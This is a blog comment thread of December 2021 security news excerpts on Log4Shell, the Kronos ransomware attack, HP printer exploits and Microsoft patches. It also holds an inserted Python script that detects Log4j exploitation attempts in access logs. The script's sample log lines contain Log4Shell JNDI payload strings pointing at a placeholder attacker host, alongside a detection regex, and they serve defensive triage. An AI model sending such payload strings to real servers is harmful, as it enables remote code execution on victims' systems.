    The LogJ4 vulnerability in the Java component of Apache servers is now being exploited at an accelerating pace. According to security company Check Point, the hole has been attacked at a rate of a hundred break-ins per minute. 72 hours after the vulnerability was discovered and its exploitation began, there had already been 846,000 attacks.

    Of the hundreds of thousands of attacks, 46 percent could be traced to known cybercriminal groups, Check Point says. Already more than 40 percent of the world’s corporate networks have been targeted. In Finland the figure was 36 percent.

    According to security professionals, LogJ4 will likely affect large online services such as Minecraft, Twitter and Apple’s iCloud.

    Reply
  36. Tomi Engdahl says:

    Log4Shell explained – how it works, why you need to know, and how to fix it
    https://nakedsecurity.sophos.com/2021/12/13/log4shell-explained-how-it-works-why-you-need-to-know-and-how-to-fix-it/

    log4shell – Quick Guide
    https://musana.net/2021/12/13/log4shell-Quick-Guide/

    Log4j warning raised to red – one of the most significant vulnerabilities
    https://www.kyberturvallisuuskeskus.fi/fi/varo_ttn2_5/2021

    Reply
  37. Tomi Engdahl says:

    https://hackaday.com/2021/12/10/this-week-in-security-printing-shellz-ms-officecmd-and-ai-security/
    Researchers at F-Secure have developed an impressive new attack, leveraging HP printers as an unexpected attack surface. Printing Shellz (PDF) is a one-click attack, where simply visiting a malicious webpage is enough to get a shell and reverse proxy installed to a printer on the same network. The demo below uses a cross-site printing (XSP) attack to send the malicious print job to the printer without any further interactions.

    https://labs.f-secure.com/publications/printing-shellz
    https://labs.f-secure.com/assets/BlogFiles/Printing-Shellz.pdf

    Reply
  38. Tomi Engdahl says:

    HR Management Firm Kronos Needs Weeks to Recover From Ransomware Attack
    https://www.securityweek.com/hr-management-firm-kronos-needs-weeks-recover-ransomware-attack

    HR management platform Ultimate Kronos Group (UKG) on Monday started notifying customers that it fell victim to a ransomware attack that took down multiple applications over the weekend.

    The attack, which took place on Saturday, December 11, 2021, targeted Kronos Private Cloud, a service on which the company runs several of its cloud applications, including Banking Scheduling Solutions, Healthcare Extensions, UKG TeleStaff, and UKG Workforce Central.

    Reply
  39. Tomi Engdahl says:

    EXPLAINER: The Security Flaw That’s Freaked Out the Internet
    https://www.securityweek.com/explainer-security-flaw-thats-freaked-out-internet

    Security pros say it’s one of the worst computer vulnerabilities they’ve ever seen. They say state-backed Chinese and Iranian hackers and rogue cryptocurrency miners have already seized on it.

    The Department of Homeland Security is sounding a dire alarm, ordering federal agencies to urgently eliminate the bug because it’s so easily exploitable — and telling those with public-facing networks to put up firewalls if they can’t be sure. The affected software is small and often undocumented.

    Detected in an extensively used utility called Log4j, the flaw lets internet-based attackers easily seize control of everything from industrial control systems to web servers and consumer electronics. Simply identifying which systems use the utility is a prodigious challenge; it is often hidden under layers of other software.

    Reply
  40. Tomi Engdahl says:

    Microsoft Patches 67 Security Flaws, Including Zero-Day Exploited by Emotet
    https://www.securityweek.com/microsoft-patches-67-security-flaws-including-zero-day-exploited-emotet

    Microsoft’s security response engine revved into overdrive this month with the release of patches for 67 documented Windows software vulnerabilities, including a zero-day bug that’s already been exploited by one of the most professional and long-lasting cybercrime gangs.

    In the final Patch Tuesday release for 2021, the Redmond, Wash. software giant called special attention to CVE-2021-43890, a spoofing vulnerability in the Microsoft Windows AppX installer and warned that the bug is being exploited in the wild by the Emotet malware operation.

    “Microsoft is aware of attacks that attempt to exploit this vulnerability by using specially crafted packages that include the malware family known as Emotet/Trickbot/Bazaloader,” the company said, warning that the bug allows an attacker to build malicious attachments for use in effective phishing campaigns.

    Reply
  41. Tomi Engdahl says:

    Log4Shell Tools and Resources for Defenders – Continuously Updated
    https://www.securityweek.com/log4shell-tools-and-resources-defenders-continuously-updated

    The widely used Apache Log4j Java-based logging tool is affected by a critical remote code execution vulnerability that has been increasingly exploited by malicious actors, including to deliver various types of malware.

    The vulnerability is tracked as CVE-2021-44228 and it has been dubbed Log4Shell and LogJam. The security hole exposes many organizations to attacks and exploitation is not difficult.

    SecurityWeek has compiled a list of tools and other resources that can be useful for defenders concerned about the impact of the Log4Shell vulnerability on their organization.

    Reply
  42. Tomi Engdahl says:

    https://www.facebook.com/groups/2600net/permalink/3192568400966263/
    Nobody gonna comment on the Kronos hack? Thousands of accounts are actively having their direct deposit redirected. EVERYONE’s banks are going to be jacked dealing with this.

    Top workforce management firm Kronos hit by ransomware attack
    https://www.hackread.com/workforce-management-firm-kronos-ransomware-attack/

    Kronos has taken down its private cloud services and advises customers to use “alternative business continuity protocols” while the company is working on mitigating the attack.

    Kronos Private Cloud is an HR management firm, also known as Ultimate Kronos Group, offering timekeeping services to many high-profile firms globally. Reportedly, the company is the latest victim of a ransomware attack.

    According to the company’s Executive VP, Bob Hughes, they noticed unusual activity this Saturday, and while mitigating the issue, they learned that UKG had suffered a ransomware attack.

    Operations Restoring May Take Weeks
    Kronos has sent emails to its corporate customers to notify them about the ransomware attack. The company stated that it had taken its private cloud services offline post the attack and advised customers to use “alternative business continuity protocols” since restoring operations may take several weeks.

    After the attack, Kronos’ clients could not access payroll processing and staff management services. Hughes urged in his blog post that clients should switch to alternative services.

    https://community.kronos.com/s/feed/0D54M00004wJKHiSAO?language=en_US

    Communications sent to impacted Kronos Private Cloud (KPC) customers beginning December 13 at 12:45AM ET:

    We are reaching out to inform you of a cyber security incident that has disrupted the Kronos Private Cloud.

    Reply
  43. Tomi Engdahl says:

    Problematic Log4j Functionality Disabled as More Security Issues Come to Light
    https://www.securityweek.com/problematic-log4j-functionality-disabled-more-security-issues-come-light

    Developers of the widely used Apache Log4j Java-based logging tool have disabled problematic functionality as more security issues have come to light.

    It was discovered recently that Log4j version 2.x is affected by a critical remote code execution vulnerability that can be easily exploited to take complete control of a system. The flaw is tracked as CVE-2021-44228, Log4Shell and LogJam, and it has been exploited in attacks since December 1, days before an official patch was released.

    Log4Shell attacks have been launched by profit-driven cybercriminals to deliver DDoS malware, cryptocurrency miners, ransomware, and other malicious programs, as well as by Chinese and Iranian state actors.

    Exploitation of the vulnerability involves sending a specially crafted request to the targeted system. The request generates a log using Log4j, which leverages the Java Naming and Directory Interface (JNDI) lookup feature to perform a request to an attacker-controlled server, from which a malicious payload is fetched and executed.

    CVE-2021-44228 was patched on December 6 with the release of Log4j 2.15.0. However, it was soon discovered that the fix was incomplete in certain non-default configurations, and exploitation could still lead to denial-of-service (DoS) attacks “or worse.”

    A new CVE identifier, CVE-2021-45046, was assigned to this issue, and another round of updates was released. The latest versions of Log4j — versions 2.12.2 and 2.16.0 — not only patch this vulnerability, but also completely remove the message lookups feature and disable access to JNDI by default.

    “JNDI lookups will now return a constant value. Also, Log4j now limits the protocols by default to only java,” Log4j developers said.

    It has also come to light that while the risk of attacks against Log4j version 1.x is lower, systems running this version are still vulnerable to attacks if JNDI is used in their configuration. CVE-2021-4104 has been assigned to this issue and while patches will not be released because version 1.x is no longer supported, mitigations are available.

    Risk Based Security has analyzed the three CVEs and noted that CVE-2021-4104 is an “entirely different attack vector.”

    The security firm pointed out that assigning a separate CVE to the incomplete fix for CVE-2021-44228 may be helpful to some organizations, but it can also cause confusion.

    As companies scramble to assess impact, threat actors are increasingly exploiting the Log4Shell vulnerability in their attacks, and many organizations appear to be exposed.

    Check Point reported seeing more than one million attack attempts, nearly half of which have been linked to known malicious groups. The company said it had seen exploitation attempts against 44% of corporate networks around the world.

    https://blog.checkpoint.com/2021/12/13/the-numbers-behind-a-cyber-pandemic-detailed-dive/

    Reply
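The comment above describes the exploit mechanism: a crafted request gets logged, Log4j resolves the JNDI lookup embedded in it, and a payload is fetched from an attacker-controlled server. The following is an added example, not code from the SecurityWeek article or from the Log4j project, showing the defender's side of that description: a Python triage script that scans access-log lines in the common combined format for the `${jndi:<scheme>://` lookup string such a request must carry, records which field it arrived in, and tallies attempts per source IP and per scheme. The log lines, the IP addresses and the `attacker.example` host are constructed placeholders, not real traffic.

```python
"""Triage helper for Log4Shell (CVE-2021-44228) exploitation attempts in web-server access logs.

Added example; not code from the article or the Log4j project. It looks for the
JNDI lookup string (``${jndi:<scheme>://...}``) in the request line, Referer and
User-Agent fields of combined-format access-log lines and reports source IP,
field and scheme, which is what a responder needs to pick hosts to check.
"""
import re
from dataclasses import dataclass

# Case-insensitive match on the lookup prefix and the scheme it points at (ldap, rmi, dns, ...).
JNDI_RE = re.compile(r"\$\{jndi:(?P<scheme>[a-z]+):", re.IGNORECASE)

# Combined log format: ip - - [time] "METHOD path HTTP/x" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


@dataclass(frozen=True)
class Hit:
    ip: str        # source address of the request
    field: str     # which log field carried the lookup string
    scheme: str    # JNDI scheme the lookup points at, lower-cased
    status: int    # HTTP status the server returned


def scan_line(line):
    """Return a Hit for the first field carrying a JNDI lookup, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None  # line not in combined format; skip rather than guess
    for field in ("request", "referer", "ua"):
        j = JNDI_RE.search(m.group(field))
        if j:
            return Hit(m.group("ip"), field, j.group("scheme").lower(), int(m.group("status")))
    return None


def scan_log(lines):
    """Scan an iterable of log lines and return the list of hits in order."""
    return [h for h in (scan_line(line) for line in lines) if h]


def summarize(hits):
    """Count attempts per source IP and per JNDI scheme for the incident report."""
    by_ip, by_scheme = {}, {}
    for h in hits:
        by_ip[h.ip] = by_ip.get(h.ip, 0) + 1
        by_scheme[h.scheme] = by_scheme.get(h.scheme, 0) + 1
    return by_ip, by_scheme


# Constructed sample lines (not real traffic); attacker.example is a placeholder host.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:14:02:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '198.51.100.23 - - [10/Dec/2021:14:05:40 +0000] "GET /?x=${jndi:rmi://attacker.example/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '198.51.100.23 - - [10/Dec/2021:14:05:41 +0000] "POST /login HTTP/1.1" 302 0 "${JNDI:dns://attacker.example/c}" "curl/7.79"',
    # Benign: the word "jndi" in a path is not a lookup and must not alert.
    '192.0.2.9 - - [10/Dec/2021:14:09:03 +0000] "GET /docs/jndi-howto.html HTTP/1.1" 200 8192 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for h in found:
        print(f"{h.ip:<14} {h.field:<8} {h.scheme:<5} status={h.status}")
    print(summarize(found))
```

A hit only means an attempt was logged; it does not tell you whether the receiving application actually passes that field through a vulnerable Log4j, so the hosts in the summary still need a version check against the fixed releases the article names (2.12.2 and 2.16.0), and the HTTP status is recorded only because a 200 on a page that logs the User-Agent deserves a closer look than a 404.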
  44. Tomi Engdahl says:

    As The Apache Software Foundation just patched Log4J 2.16.0, we’ve quickly whipped up a new release; Arduino IDE 1.8.18. We can all sleep safe again!
    https://www.arduino.cc/en/software

    Reply
